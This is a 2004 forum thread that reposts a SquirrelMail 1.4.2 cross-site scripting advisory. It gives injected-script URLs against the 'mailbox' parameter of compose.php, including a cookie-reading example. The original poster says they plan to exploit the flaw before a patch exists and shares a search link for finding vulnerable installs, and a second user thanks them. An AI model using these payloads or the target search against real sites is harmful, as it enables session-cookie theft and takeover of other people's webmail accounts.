tweakz20
May 1 2004, 05:59 AM
| CODE |
SquirrelMail latest version (although is tested on version 1.4.2) is
prone to many cross scripting attacks that can be used to steal user
cookies.The Exploit lies in the way squirrel mail represents the folder
names and shows them.To make the matters worse.No extra unique variable
added to the url for each user therefore it is easy for the attacker to
just pass the url in mail and steal the session cookie.
Some of the exploit are at :
http://victim.com/mail/src/compose.php?mailbox=INBOX
which can be replaced as follows
http://victim.com/mail/src/compose.php?mailbox="><script>malacious
script</script>
Example:
http://victim.com/mail/src/compose.php?mailbox="><script>window.alert(document.cookie)</script>
-------------------------------------------------------------------------
Squirrel Mail Coders have been informed of this vulnerability but the
vulnerability still exists in their latest version.
-------------------------------------------------------------------------
|
normally i wouldn't care, but this time it looks like we can play with it before anyone gets patched (as there is none...)
tweakz20
May 1 2004, 06:10 AM
after a little more research, here's a link for a google search
http://www.google.com/search?as_q=&num=10&...ch=&safe=imagesonly problem is that you have to register with them first... most allow public registrations though...
Kynroxes
May 1 2004, 10:05 AM
you rule !! tweakz20 tks for the link to google
